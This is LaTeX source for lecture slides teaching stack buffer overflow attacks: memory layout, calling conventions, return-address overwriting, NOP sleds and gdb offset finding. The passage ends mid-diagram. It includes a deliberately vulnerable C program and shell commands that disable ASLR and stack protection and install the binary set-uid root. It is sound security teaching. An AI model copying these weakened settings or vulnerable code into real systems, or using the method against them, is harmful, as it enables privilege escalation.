\input{../common/header.tex}
\input{../common/cmds.tex}
\input{draw_cmds.tex}

\title{Ch. 5 - Buffer Overflow}

\begin{document}
\input{../common/front.tex}

\section{Introduction}

\begin{frame}
\frametitle{Basic idea}
\begin{itemize}[<+->]
\item Get out of some buffer
    \begin{itemize}
    \item User input
    \item Processing buffers
    \end{itemize}
\item If careful, the program does not crash
\item Exploit the data there
    \begin{itemize}
    \item Directly, if sensitive
    \item Indirectly, if functional
    \end{itemize}
\item Rewrite the data there 
    \begin{itemize}
    \item Overwrite sensitive data
    \item Overwrite return addresses
    \end{itemize}
\end{itemize}
\end{frame}

\begin{frame}
\frametitle{What we focus on}
\begin{itemize}[<+->]
\item Stack buffer overflow
\item We deactivate some protections against buffer overflow attacks
\item Buffer overflow has a long history
\item We will reactivate most of them later on
\item We will run our experiments in a virtual machine
	\begin{itemize}
	\item Ubuntu 16.04
	\end{itemize}
\end{itemize}
\end{frame}

\section[Recalls]{Microprocessor recalls}

\begin{frame}
\frametitle{Program memory layout and allocation}
\begin{itemize}[<+->]
\item When a program runs, it needs memory space to store data
\item The memory inside of a process is structured into \emph{segments}
\item Usually, there are at least 4 segments\footnote{Language dependent}
	\begin{itemize}
	\item Text segment (also code segment) : stores program instructions
		\begin{itemize}
		\item Often read-only
		\end{itemize}
	\item Data segment : global variables, initialized or not, read only or not
		\begin{itemize}
		\item Often divided into \texttt{.data}, \texttt{.rodata} and \texttt{.bss} sub-segments
		\item Static allocation class
		\end{itemize}
	\item Stack : stores local variables, enables function calls
		\begin{itemize}
		\item Automatic allocation class
		\end{itemize}
	\item Heap : dynamically allocated memory
		\begin{itemize}
		\item \texttt{new}, \texttt{malloc}, \texttt{delete}, \texttt{free}
		\item Dynamic allocation class
		\end{itemize}
	\end{itemize}
\end{itemize}
\end{frame}

\begin{frame}
\frametitle{Illustration}
\begin{center}
\begin{tikzpicture}[rotate=90,yscale=.7,xscale=.7]
%reserved low
\draw[fill=black!30] (0,0) rectangle (4,-1);
\node[rotate=90] at (2,-0.5) {Reserved};

%CS
\draw[fill=blue!50] (0,-1) rectangle (4,-2.5);
\node[rotate=90] at (2,-1.75) {Code segment};

%DS
\draw[fill=blue!50] (0,-2.5) rectangle (4,-5.5);
\node at (3.5,-4) {\footnotesize Data segment};
\draw[dotted] (0,-3.5) -- (3.25,-3.5);
\draw[dotted] (0,-4.5) -- (3.25,-4.5);
\node[rotate=90] at (1.75,-3) {\tt .rodata};
\node[rotate=90] at (1.75,-4) {\tt .data};
\node[rotate=90] at (1.75,-5) {\tt .bss};

%HEAP
\draw[blue!50, fill=blue!50] (0,-5.5) rectangle (4,-8.5);
\draw (0,-5.5) -- (4,-5.5);
\node at (2,-7) {\Large Heap};
\draw[->,>=stealth,very thick,blue!50] (2,-8.5) -- (2,-9.5);

%STACK
\draw[blue!50, fill=blue!50] (0,-11.5) rectangle (4,-14.5);
%\draw (0,-5.5) -- (4,-5.5);
\node at (2,-13) {\Large Stack};
\draw[->,>=stealth,very thick,blue!50] (2,-11.5) -- (2,-10.5);

%reserved low
\draw[fill=black!30] (0,-14.5) rectangle (4,-15.5);
\node[rotate=90] at (2,-15) {Reserved};

%brackets
\draw [decorate,decoration={brace,amplitude=7pt,mirror},xshift=0pt,yshift=-4pt] (-0.5,-1) -- (-0.5,-14.25) node [midway,yshift=-20pt] {User level};

%exterior bars
\draw (0,0) -- (0,-8.5);
\draw (4,0) -- (4,-8.5);
\draw (0,-11.5) -- (0,-15.5);
\draw (4,-11.5) -- (4,-15.5);
\draw[dashed] (0,0) -- (0,0.5);
\draw[dashed] (4,0) -- (4,0.5);
\draw[dashed] (0,-8.5) -- (0,-9);
\draw[dashed] (4,-8.5) -- (4,-9);
\draw[dashed] (0,-11.5) -- (0,-11);
\draw[dashed] (4,-11.5) -- (4,-11);
\draw[dashed] (0,-15.5) -- (0,-16);
\draw[dashed] (4,-15.5) -- (4,-16);

%adresses
\node[rotate=90] at (5.25,-0.25) {\scriptsize \tt 0x00000000};
\node[rotate=90] at (5.25,-1.25) {\scriptsize \tt 0x04000000};
\node[rotate=90] at (5.25,-14.75) {\scriptsize \tt 0x08000000};
\node[rotate=90] at (5.25,-15.75) {\scriptsize \tt 0xFFFFFFFF};

%big arrow above
\draw[ultra thick,>=stealth,->] (7,0) node[above right, rotate=0] {\small High adresses} -- (7,-16) node[above, midway, rotate=0,yshift=.4cm] {Adress space} node[above left, rotate=0] {\small Low adresses} ;
\end{tikzpicture}
\end{center}
\end{frame}

\begin{frame}[containsverbatim]
\frametitle{Allocation example}
\begin{itemize}
\item File \texttt{alloc.c}
\end{itemize}
\begin{lstlisting}
int x = 100; //.data

int main()
{
	int a = 2; //stack
	float b = 2.5; //stack
	
	static int y; //.bss
	
	int *pt = (int*) malloc(2 * sizeof(int)); //pt on stack, *pt on heap
	pt[0] = 5; //on heap
	pt[1] = 6; //on heap
	
	free(pt);
}
\end{lstlisting}
\begin{itemize}
\item Note: the standard garantees storage duration, not location
    \begin{itemize}
    \item ... but it is most likely how it happens
    \end{itemize}
\end{itemize}
\end{frame}

\begin{frame}
\frametitle{Allocation illustration}
\begin{center}
\includegraphics[height=6.5cm]{pics/allocation.pdf}
\end{center}
\end{frame}

\begin{frame}
\frametitle{Function calls}
\begin{itemize}[<+->]
\item Stack is used to store data during function calls
	\begin{itemize}
	\item Some function parameters
	\item \emph{Return address}
	\item Backups of registers
	\end{itemize}
\item Whenever a function is called, a block of memory is pushed onto the stack
	\begin{itemize}
	\item Stack frame
	\item \texttt{enter} in assembly language
	\end{itemize}
\end{itemize}
\begin{exampleblock}<+->{Evil question}
	\begin{itemize}
	\item What about the confidentiality / integrity of what is stored ?
	\end{itemize}
\end{exampleblock}
\end{frame}

\begin{frame}
\frametitle{Before a call}
\begin{center}
\begin{tikzpicture}[xscale=0.45, yscale=0.25]
\drawcs{12}{4}{500}{10}{11}{6}{2}

\begin{scope}[xshift=13cm]
	\node at (2,14) {Stack};
	\drawstack{12}{4}{1000}{0}{15}
\end{scope}
\end{tikzpicture}
\end{center}
\end{frame}

\begin{frame}
\frametitle{After a call}
\begin{center}
\begin{tikzpicture}[xscale=0.45, yscale=0.25]
\drawcs{12}{4}{500}{5}{11}{6}{2}		
	
\begin{scope}[xshift=13cm]
	\node at (2,14) {\Large Stack};
	\drawstack{12}{4}{1000}{8}{15}
	\node[inner sep=0pt, rounded corners=5pt, minimum width=1.7cm, fill=red!70,minimum height=1.9cm] at (2,4) {\color{black} \LARGE 491};
\end{scope}
\end{tikzpicture}
\end{center}
\end{frame}

\begin{frame}
\frametitle{Stack frame layout}
\begin{enumerate}[<+->]
\item Arguments : function parameters that have been pushed on the stack
	\begin{itemize}
	\item The compiler decides which ones (according to the ABI)
	\end{itemize}
\item Return address : will tell the CPU where to jump when \lstinline|return| is executed
	\begin{itemize}
	\item Automatically pushed by \texttt{call}
	\end{itemize}
\item Frame pointer : tells "where the stack is" before we enter a function
	\begin{itemize}
	\item \texttt{rbp} denotes the previous stack frame
	\item \texttt{rbp + 8} denotes the return address
	\item \texttt{rbp + 16} denotes the first function parameter passed on the stack
		\begin{itemize}
		\item If there is such a parameter
		\end{itemize}
	\end{itemize}
\item Local variables
	\begin{itemize}
	\item Stored at \texttt{rbp - s}, where \texttt{s} is the size of the register backups
	\item \emph{Always} accessed like this, since addresses of local variables cannot be determined \emph{at compile time} relatively from the top of the stack
	\end{itemize}
\end{enumerate}
\end{frame}

\newcolumntype{C}[1]{>{\centering\let\newline\\\arraybackslash\hspace{0pt}}m{#1}}

\begin{frame}
\frametitle{Preparing the stack}
\begin{itemize}
\onslide<1->{\item x86-64 ABI states that, when a function is called,}
	\begin{itemize}
	\onslide<2->{\item the six first "integer" parameters are passed via registers,}
	\onslide<3->{\item other non-floating parameters are passed via the stack,}
	\onslide<4->{\item some registers must be preserved.}
	\end{itemize}
\end{itemize}
\onslide<5->{
\begin{center}
\begin{tabular}{m{1.5cm}|m{6cm}|C{2.5cm}}
\textbf{Register} & \textbf{Usage} & \textbf{Preserved?}\\
\hline
rax & 1\textsuperscript{st} return register & No\\
rbx & Temporary register & Yes\\
rcx, rdx, rsi, rdi, r8, r9 & 6 first integer function parameters & No\\
r10, r11 & Temporary register & No\\
r12, r13, r14, r15 & Temporary register & Yes\\
rsp & Stack pointer & Yes\\
rbp & Stack frame pointer & Yes\\
%xmm0 - xmm7 & Floating function parameters & No\\
\end{tabular}
\end{center}}
\end{frame}

\begin{frame}[containsverbatim]
\frametitle{Code sample}
\begin{lstlisting}[style=asm]
...

main:
	mov		rdi, 1			;first param
	mov 	rsi, 2			;second param
	mov 	rdx, 3			;third param
	mov 	rcx, 4			;fourth param
	mov 	r8, 5			  ;fifth param
	mov 	r9, 6			  ;sixth param
	push qword	8			;eight param
	push qword	7			;seventh param

	call	sum

sum:
	enter	0, 0				;creates stack frame (backs up rbp, rbp points there now)
	
	push	rbx					;saves registers preserved by function call
	push	r12					
	push	r13
	push	r14
	push	r15
	
...
\end{lstlisting}
\end{frame}

\begin{frame}
\frametitle{Stack frame layout}
\begin{center}
\includegraphics[width=12cm,height=5cm]{pics/stack-frame-layout.pdf}
\end{center}
\end{frame}

\section[The attack]{Stack buffer overflow attack}

\begin{frame}
\frametitle{Types of attacks}
\begin{itemize}[<+->]
\item Buffer overflow can happen in stack and heap
\item Diffrents ways to exploit this
\item Here : stack-based attack
	\begin{itemize}
	\item \emph{Way more} common
	\item Easier to exploit
	\item Easier to detect
	\item Easier to patch
	\end{itemize}
\end{itemize}
\end{frame}

\begin{frame}
\frametitle{Exploit copy}
\begin{itemize}[<+->]
\item Programs often copy memory
\item Before copying, memory needs to be allocated in the destination
\end{itemize}
\begin{exampleblock}<+->{Question}
	\begin{itemize}[<+->]
	\item What if an unsufficient amount of memory is allocated ?
	\end{itemize}
\end{exampleblock}
\begin{itemize}[<+->]
\item Buffer overflow
\item The result is \emph{not always} a crash
\item It can allow an attacker to take complete control of a program
	\begin{itemize}
	\item And its priviledges rights
	\end{itemize}
\end{itemize}
\end{frame}

\begin{frame}[containsverbatim]
\frametitle{Example}
\begin{itemize}
\item File \texttt{str-cpy.c}
\end{itemize}
\begin{lstlisting}
void doStuff(const char* s)
{
	char dest[13];
	strcpy(dest, s); //ok
		
	char dest2[12];
	strcpy(dest2, s);  //overflow
		
	const char* s2 = "My really long beautiful string";
	strcpy(dest2, s2); //overflow
}

int main()
{
	const char* s  = "Hello there!";
	
	printf(%zu, strlen(s)); //12
	printf(%zu, sizeof s);  //13 -> null terminator included		
	
	doStuff(s);
}
\end{lstlisting}
\end{frame}

\definecolor{Dandelion}{rgb}{0.94, 0.88, 0.19}
\definecolor{Cerulean}{rgb}{0.11, 0.67, 0.84}
\definecolor{Green}{rgb}{0.0, 0.65, 0.31}

\begin{frame}
\frametitle{Illustration}
\begin{center}
\begin{tikzpicture}[yscale=.4]
\node[inner sep=0pt, rounded corners=5pt, minimum width=3.8cm, fill=Dandelion,minimum height=1.9cm] at (2,2.5) {};
\node[anchor=west] at (0.05, 0.5) {\scriptsize \tt dest2[0]};
\node at (1.25,2.5) {\scriptsize $\vdots$};
\node[anchor=west] at (0.05, 4.5) {\scriptsize \tt dest2[11]};

\node[inner sep=0pt, rounded corners=5pt, minimum width=3.8cm, fill=Cerulean,minimum height=0.5cm] at (2,5.75) {};
\node[anchor=west] at (0.05, 5.75) {\scriptsize Register backups};

\node[inner sep=0pt, rounded corners=5pt, minimum width=3.8cm, fill=Green,minimum height=0.5cm] at (2,7.25) {};
\node[anchor=west] at (0.05, 7.25) {\scriptsize Previous frame pointer};

\node[inner sep=0pt, rounded corners=5pt, minimum width=3.8cm, fill=magenta,minimum height=0.5cm] at (2,8.75) {};
\node[anchor=west] at (0.05, 8.75) {\scriptsize Return adress};

\draw[->, very thick, red!70] (4.25,0.5) -- (4.25,9) node[midway, below, rotate=90] {\small Buffer copy};
\draw[very thick,>=stealth,<-] (5,-1) node[above left, rotate=270] {Low addresses} -- (5,17) node[above, midway, rotate=270,yshift=.4cm] {\Large Stack growth} node[above right, rotate=270] {High addresses} ;

\draw [decorate,decoration={brace,amplitude=7pt},xshift=-4pt,yshift=0pt] (-1,-1) -- (-1,9) node [midway,xshift=-20pt,rotate=90] {\small{\tt doStuff} stack frame};

\draw [decorate,decoration={brace,amplitude=7pt},xshift=-4pt,yshift=0pt] (-1,9.5) -- (-1,16.5) node [midway,xshift=-20pt,rotate=90] {\small{\tt main} stack frame};

\draw (0,16) -- (4,16);
\draw (0,9.5) -- (4, 9.5);
%\draw (0,8.5) -- (4, 8.5);
\draw (0,8) -- (4, 8);
\draw (0,6.5) -- (4, 6.5);
\draw (0,5) -- (4,5);
\draw (0,0) -- (4,0);

\draw (0,0) -- (0,16);
\draw (4,0) -- (4,16);
\draw[dashed] (0,0) -- (0,-1);
\draw[dashed] (4,0) -- (4,-1);
\draw[dashed] (0,16) -- (0,17);
\draw[dashed] (4,16) -- (4,17);
\end{tikzpicture}
\end{center}
\end{frame}

\begin{frame}
\frametitle{2D20 critical strike}
\begin{itemize}[<+->]
\item \texttt{strcpy} does not stop until it sees \lstinline|'\\0'|
\item The space on the stack above the destination buffer includes \emph{critical values}
	\begin{itemize}
	\item The return adress and the previous frame pointer
	\end{itemize}
\item If the return adress is overwritten by buffer overflow, the CPU will jump "somewhere else"
\item Possible scenarios
	\begin{itemize}
	\item The new adress (virtual) is not mapped to a physical one : crash
	\item The new adress is mapped to a protected space : segmentation fault
	\item The new adress is mapped to an unprotected space that does not correspond to an instruction : crash
	\item The new adress is mapped to an unprotected space that corresponds to an instruction : the program keeps running
	\end{itemize}
\item What if we make the program jump on something malicious we wrote ?
\end{itemize}
\end{frame}

\begin{frame}
\frametitle{Hijack programs}
\begin{itemize}[<+->]
\item As attackers, we want the program to jump on something malicious we wrote
\item If we can control the code to run, we can hijack the execution
\item If the program is priviledged, controlling the program grants us priviledges
\end{itemize}
\begin{exampleblock}<+->{How to exploit}
	\begin{itemize}[<+->]
	\item Previous examples do not take input from user
		\begin{itemize}
		\item We cannot take advantage of the overflow
		\end{itemize}
	\item In "real" programs, user input is often requested
	\end{itemize}
\end{exampleblock}
\end{frame}

\begin{frame}[containsverbatim]
\frametitle{Example}
\begin{itemize}
\item File \texttt{overflow.c}
\end{itemize}
\begin{lstlisting}
#include <stdlib.h>
#include <stdio.h>
#include <string.h>

int copy_stuff(const char* str)
{
	char buffer[100];	
	strcpy(buffer, str);
	
	return 1;
}

int main()
{
	char[400] str;
	
	FILE* badfile = fopen("badfile", "r");
	fread(str, sizeof char, 300, badfile);
	
	copy_stuff(str);
	
	printf("Alright\n");
	return 1;
}
\end{lstlisting}
\end{frame}

\begin{frame}
\frametitle{The overflow}
\begin{itemize}[<+->]
\item Clearly, there is buffer overflow
	\begin{itemize}
	\item 400-bytes array copied to a 100-bytes array
	\end{itemize}
\item This time, the input is user-controlled
\end{itemize}
\begin{exampleblock}<+->{Question}
	\begin{itemize}[<+->]
	\item What should we write in \texttt{badfile} ?
		\begin{itemize}
		\item We want to run malicious code
		\end{itemize}
	\end{itemize}
\end{exampleblock}
\begin{itemize}[<+->]
\item We need to know where
	\begin{enumerate}
	\item the entry point of our malicous code is
	\item the return address is
	\end{enumerate}
\item If we fail, we will most likely cause a segmentation fault
\end{itemize}
\end{frame}

\begin{frame}
\frametitle{Illustration}
\begin{center}
\begin{tikzpicture}[yscale=.4,scale=.85]
\node[inner sep=0pt, rounded corners=5pt, minimum width=3.2cm, fill=Dandelion,minimum height=1.6cm] at (2,2.5) {};
\node[anchor=west] at (0.05, 0.55) {\scriptsize \tt buffer[0]};
\node at (1.25,2.5) {\scriptsize $\vdots$};
\node[anchor=west] at (0.05, 4.45) {\scriptsize \tt buffer[99]};

\node[inner sep=0pt, rounded corners=5pt, minimum width=3.2cm, fill=Cerulean,minimum height=0.425cm] at (2,5.75) {};
\node[anchor=west] at (0.05, 5.75) {\scriptsize Previous frame pointer};

\node[inner sep=0pt, rounded corners=5pt, minimum width=3.2cm, fill=Green,minimum height=0.425cm] at (2,7.25) {};
\node[anchor=west] at (0.05, 7.25) {\scriptsize Return adress};

\node[inner sep=0pt, rounded corners=5pt, minimum width=3.2cm, fill=magenta,minimum height=0.85cm] at (2,9.5) {};
\node[anchor=west] at (0.05, 9.5) {\scriptsize Arguments};

\draw (0,10.95) -- (4, 10.95);
%\draw (0,8.5) -- (4, 8.5);
\draw (0,8) -- (4, 8);
\draw (0,6.5) -- (4, 6.5);
\draw (0,5) -- (4,5);
\draw (0,0) -- (4,0);

\draw (0,0) -- (0,16);
\draw (4,0) -- (4,16);
\draw[dashed] (0,0) -- (0,-1);
\draw[dashed] (4,0) -- (4,-1);
\draw[dashed] (0,16) -- (0,17);
\draw[dashed] (4,16) -- (4,17);

\node at (2,18) {\footnotesize Stack before buffer copy};
\node at (4.5,7.25) {\LARGE +};

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

\draw[fill=blue!60] (5,0) rectangle (8,15.5);
\draw[fill=red!70] (5,6.5) rectangle (8,8);
\node[anchor=west] at (5.05, 7.25) {\scriptsize New adress};
\draw[fill=red!70] (5,12.45) rectangle (8,15.5);
\node at (6.5,14) {\footnotesize Malicious code};

\node at (6.5,18) {\footnotesize badfile};
\node at (8.5,7.25) {\Large $\rightarrow$};

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

\begin{scope}[xshift=9cm]
\node[inner sep=0pt, minimum width=3.2cm, fill=blue!60,minimum height=2.05cm] at (2,3.25) {(Overwritten)};

\node[inner sep=0pt, minimum width=3.2cm, fill=red!70,minimum height=0.425cm] at (2,7.25) {};
\node[anchor=west] at (0.05, 7.25) {\scriptsize New return adress};

\node[inner sep=0pt, minimum width=3.2cm, fill=blue!60,minimum height=1.4cm] at (2,10.25) {(Overwritten)};

\node[inner sep=0pt, minimum width=3.2cm, fill=red!70,minimum height=0.85cm] at (2,14) {\footnotesize Malicious code};

\node[anchor=west] (rbp) at (4.3, 5) {\texttt{rbp}};
\draw[->] (rbp) -- (4.1,5);

\draw[ultra thick,->] (4.1, 7.25) to[out=80,in=-80] (4.1,12.6);
\node at (4.9,10) {\texttt{jmp}};

\draw (0,15.5) -- (4,15.5);
\draw (0,12.45) -- (4,12.45);
\draw (0,8) -- (4, 8);
\draw (0,6.5) -- (4, 6.5);
\draw (0,5) -- (4,5);
\draw (0,0) -- (4,0);

\draw (0,0) -- (0,16);
\draw (4,0) -- (4,16);
\draw[dashed] (0,0) -- (0,-1);
\draw[dashed] (4,0) -- (4,-1);
\draw[dashed] (0,16) -- (0,17);
\draw[dashed] (4,16) -- (4,17);

\node at (2,18) {\footnotesize Stack after buffer copy};
\end{scope}
\end{tikzpicture}
\end{center}
\end{frame}

\section[Deployment]{Deploying the attack}

\begin{frame}
\frametitle{Disabling some protections}
\begin{itemize}[<+->]
\item Buffer overflow has a \emph{long} history 
\item Modern kernels include a lot of protection against them
\item These protections make attacks more difficult, but not impossible
\item We want this section to be about buffer overflow itself
	\begin{itemize}
	\item And not about every tweak you need to implement to bypass these protections
	\end{itemize}
\end{itemize}
\begin{exampleblock}<+->{Common protections}
	\begin{itemize}[<+->]
	\item Address randomisation : makes the location of functions, stack, heap and libraries hard to guess
	\item Non executable stack
	\item Canaries
	\end{itemize}
\end{exampleblock}
\end{frame}

\begin{frame}[containsverbatim]
\frametitle{Setup}
\begin{itemize}
\item Ubuntu 12.04 LTS\footnote{\url{http://be.releases.ubuntu.com/12.04/} - Support ended on April 28, 2017}
\item Disable address randomisation
\end{itemize}
\begin{lstlisting}[style=bash]
ssd@ssd-vb:~$  sudo sysctl -w kernel.randomize_va_space=0
kernel.randomize_va_space=0
\end{lstlisting}
\begin{itemize}
\item Make the stack executable
\item Disable Stack-Guard
\end{itemize}
\begin{lstlisting}[style=bash]
ssd@ssd-vb:~$ gcc -o overflow -z execstack -fno-stack-protector overflow.c 
\end{lstlisting}
\begin{itemize}
\item Make the program set-uid
\end{itemize}
\begin{lstlisting}[style=bash]
ssd@ssd-vb:~$ sudo chown root overflow
ssd@ssd-vb:~$ sudo chmod 4755 overflow
\end{lstlisting}
\end{frame}

\begin{frame}
\frametitle{Finding the address of the malicious code}
\begin{itemize}[<+->]
\item If we want to jump to our malicious code, we need to know what its entry point is
	\begin{itemize}
	\item The address of the first instruction to execute
	\end{itemize}
\item We know that our code will be copied into a buffer on the stack
\item We don't know the address of that buffer
	\begin{itemize}
	\item Depends on the program's stack usage
	\end{itemize}
\item We know the offset of our malicious code
\item We \emph{need} to know the address of \texttt{copy\_stuff} stack frame to know where our malicious code will be stored
\item The target program is unlikely to give that information
\item We have to guess
\end{itemize}
\end{frame}

\begin{frame}
\frametitle{Magic Mirror in my hand}
\begin{itemize}[<+->]
\item In theory, the search space has size $2^{32}$ on a 32 bits machine
	\begin{itemize}
	\item Our VM is 32 bits
	\end{itemize}
\end{itemize}
\begin{exampleblock}<+->{Good news : is is much smaller in practice}
	\begin{enumerate}[<+->]
	\item Without countermeasures, most OS's place the stack at a fixed address	
		\begin{itemize}
		\item A virtual address, mapped to a different physical address for each process
		\item Different programs can have the same address for the stack without conflicting	
		\end{itemize}
	\item Most programs do not have a deep stack
		\begin{itemize}
		\item Only if function call chains are long
		\end{itemize}
	\end{enumerate}
\end{exampleblock}
\begin{itemize}[<+->]
\item Searching for the address of the malicious code should not be a nightmare
\end{itemize}
\end{frame}

\begin{frame}[containsverbatim]
\frametitle{Example}
\begin{itemize}
\item File \texttt{stack-frame-adress.c}
\end{itemize}
\begin{lstlisting}
#include <stdio.h>

void foo(int* pti)
{
	printf("Adress of param    : %p\n", &pti);
}

int main()
{
	int x = 42;

	printf("Adress of x        : %p\n", &x);
	printf("Adress of foo      : %p\n", foo);
	foo(&x);	
}
\end{lstlisting}
\begin{itemize}
\item We will compile the program and run it in two environments
	\begin{itemize}
	\item With address randomisation (hard)
	\item Without address randomisation (easy)
	\end{itemize}
\item We will see later that we can bypass randomisation
\end{itemize}
\end{frame}

\begin{frame}[containsverbatim]
\frametitle{Result}
\begin{lstlisting}[style=bash]
ssd@ssd-vb:~$ gcc -o stack-frame-address stack-frame-address.c
ssd@ssd-vb:~$ ./stack-frame-address
Address of x        : 0xbfb43fbc
Address of foo      : 0x80483e4
Address of param    : 0xbfb43fa0
ssd@ssd-vb:~$ ./stack-frame-address
Address of x        : 0xbfd3c03c
Address of foo      : 0x80483e4
Address of param    : 0xbfd3c020
ssd@ssd-vb:~$  sudo sysctl -w kernel.randomize_va_space=0
kernel.randomize_va_space=0
ssd@ssd-vb:~$ gcc -o stack-frame-address stack-frame-address.c
ssd@ssd-vb:~$ ./stack-frame-address
Address of x        : 0xbffff35c
Address of foo      : 0x80483e4
Address of param    : 0xbffff340
ssd@ssd-vb:~$ ./stack-frame-address
Address of x        : 0xbffff35c
Address of foo      : 0x80483e4
Address of param    : 0xbffff340
\end{lstlisting}
\end{frame}

\begin{frame}
\frametitle{Improving chances at guessing}
\begin{itemize}[<+->]
\item If we override the return address with something invalid, we will most likely cause a segmentation fault
\item It would be nice to have several entry points
\end{itemize}
\begin{example}<+->{Idea}
	\begin{itemize}[<+->]
	\item Flood the space between the return address and our code with \texttt{NOP}
		\begin{itemize}
		\item \texttt{NOP} is a processor instruction that does nothing beyond incrementing \texttt{rip}
		\end{itemize}
	\end{itemize}
\end{example}
\begin{itemize}[<+->]
\item Like this, if we jump into that space, we will eventually reach our malicious code
	\begin{itemize}
	\item x86 ABI specifies that the opcode for \texttt{NOP} is \texttt{0x90}
	\end{itemize}
\item If we build \texttt{badfile}
\end{itemize}
\end{frame}

\begin{frame}
\frametitle{Illustration}
\begin{center}\scalebox{.9}{
\begin{tikzpicture}[yscale=.4,scale=.85]
\node[inner sep=0pt, minimum width=3.2cm, fill=blue!60,minimum height=2.05cm] at (2,3.25) {(Overwritten)};

\node[inner sep=0pt, minimum width=3.2cm, fill=red!70,minimum height=0.425cm] at (2,7.25) {};
\node[anchor=west] at (0.05, 7.25) {\scriptsize New return adress};

\node[inner sep=0pt, minimum width=3.2cm, fill=blue!60,minimum height=1.4cm] at (2,10.25) {(Overwritten)};

\node[inner sep=0pt, minimum width=3.2cm, fill=red!70,minimum height=0.85cm] at (2,14) {\footnotesize Malicious code};

\node[anchor=west] (rbp) at (4.3, 5) {\texttt{rbp}};
\draw[->] (rbp) -- (4.1,5);

\draw[ultra thick,->] (4.1, 7.25) to[out=60,in=-60] (4.1,10.6);
\node at (5.2,9) {\texttt{jmp}};

\draw (0,15.5) -- (4,15.5);
\draw (0,12.45) -- (4,12.45);
\draw (0,8) -- (4, 8);
\draw (0,6.5) -- (4, 6.5);
\draw (0,5) -- (4,5);
\draw (0,0) -- (4,0);

\draw (0,0) -- (0,16);
\draw (4,0) -- (4,16);
\draw[dashed] (0,0) -- (0,-1);
\draw[dashed] (4,0) -- (4,-1);
\draw[dashed] (0,16) -- (0,17);
\draw[dashed] (4,16) -- (4,17);

\node at (2,18) {\footnotesize Without \texttt{NOP}};
\node at (2,-2) {\small Inaccurate guess - Failure};

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
\begin{scope}[xshift=9cm]
\node[inner sep=0pt, minimum width=3.2cm, fill=blue!60,minimum height=2.05cm] at (2,3.25) {(Overwritten)};

\node[inner sep=0pt, minimum width=3.2cm, fill=red!70,minimum height=0.425cm] at (2,7.25) {};
\node[anchor=west] at (0.05, 7.25) {\scriptsize New return adress};

%\node[inner sep=0pt, minimum width=3.2cm, fill=blue!60,minimum height=1.4cm] at (2,10.25) {(Overwritten)};
\node[inner sep=0pt, rounded corners=5pt, minimum width=3.2cm, fill=Cerulean,minimum height=0.425cm] at (2,8.74) {\texttt{NOP}};
\node[inner sep=0pt, rounded corners=5pt, minimum width=3.2cm, fill=Cerulean,minimum height=0.425cm] at (2,10.22) {\texttt{NOP}};
\node[inner sep=0pt, rounded corners=5pt, minimum width=3.2cm, fill=Cerulean,minimum height=0.425cm] at (2,11.7) {\texttt{NOP}};

\node[inner sep=0pt, minimum width=3.2cm, fill=red!70,minimum height=0.85cm] at (2,14) {\footnotesize Malicious code};

\node[anchor=west] (rbp) at (4.3, 5) {\texttt{rbp}};
\draw[->] (rbp) -- (4.1,5);

\draw[ultra thick,->] (4.1, 7.25) to[out=60,in=-60] (4.1,10.22);
\node at (5.1,8.84) {\texttt{jmp}};

\draw[ultra thick,->] (-0.1, 10.22) to[out=120,in=-120] (-0.1,11.7);
\draw[ultra thick,->] (-0.1, 11.7) to[out=120,in=-120] (-0.1,13);

\draw (0,15.5) -- (4,15.5);
\draw (0,12.45) -- (4,12.45);
\draw (0,10.96) -- (4,10.96);
\draw (0,9.48) -- (4,9.48);
\draw (0,8) -- (4, 8);
\draw (0,6.5) -- (4, 6.5);
\draw (0,5) -- (4,5);
\draw (0,0) -- (4,0);

\draw (0,0) -- (0,16);
\draw (4,0) -- (4,16);
\draw[dashed] (0,0) -- (0,-1);
\draw[dashed] (4,0) -- (4,-1);
\draw[dashed] (0,16) -- (0,17);
\draw[dashed] (4,16) -- (4,17);

\node at (2,18) {\footnotesize With \texttt{NOP}};
\node at (2,-2) {\small Inaccurate guess - Success};
\end{scope}
\end{tikzpicture}}
\end{center}
\end{frame}

\begin{frame}
\frametitle{Finding the address without guessing}
\begin{itemize}[<+->]
\item In the case of a local attack, we can investigate
	\begin{itemize}
	\item Set-uid programs
	\end{itemize}
\item Copy the target program, and derive the address for the injected code
\item Harder in the case of remote attacks
\item A common way of investigating : use \texttt{gdb}
\item Find out where frame pointer is when \texttt{copy\_stuff} is called
\item Note that we will debug with normal privileges
	\begin{itemize}
	\item No escalation possible this way
	\end{itemize}
\end{itemize}
\end{frame}

\begin{frame}
\frametitle{The idea}
\begin{itemize}[<+->]
\item With \texttt{gdb}, set a breakpoint at \texttt{copy\_stuff}
	\begin{itemize}
	\item Will allow investigation
	\item Prevents the segmentation fault
	\end{itemize}
\item Print \texttt{rbp} there
\item Print the address of \texttt{buffer}
\item The return address is stored at \texttt{rbp} + 8 (x64)
\item The first address we can jump on is \texttt{rbp} + 16 (x64)
	\begin{itemize}
	\item This is what to write inside the return address field
	\end{itemize}
\item Compute the distance $\Delta$ between \texttt{rbp} and \texttt{buffer}
\item The address field is stored at $\Delta + 8$ (x64)
	\begin{itemize}
	\item Because the buffer is copied to the buffer starting from its beginning
	\end{itemize}
\end{itemize} 
\end{frame}

\begin{frame}
\frametitle{The goal}
\begin{center}
\begin{tikzpicture}[yscale=.4,scale=.85]
\node[inner sep=0pt, minimum width=3.2cm, fill=red!70,minimum height=0.425cm] at (2,7.25) {};
\node[anchor=west] at (0.05, 7.25) {\scriptsize Return address field};

\node[inner sep=0pt, minimum width=3.2cm, fill=red!70,minimum height=0.85cm] at (2,14) {\footnotesize Malicious code};

\node[inner sep=0pt, rounded corners=5pt, minimum width=3.2cm, fill=Cerulean,minimum height=0.425cm] at (2,8.74) {\texttt{NOP}};
\node at (2,10.22) {\raisebox{0.5em}{$\vdots$}};
\node[inner sep=0pt, rounded corners=5pt, minimum width=3.2cm, fill=Cerulean,minimum height=0.425cm] at (2,11.7) {\texttt{NOP}};

\node[inner sep=0pt, rounded corners=5pt, minimum width=3.2cm, fill=Cerulean,minimum height=0.425cm] at (2,0.74) {\texttt{NOP}};
\node at (2,3.25) {\raisebox{0.5em}{$\vdots$}};
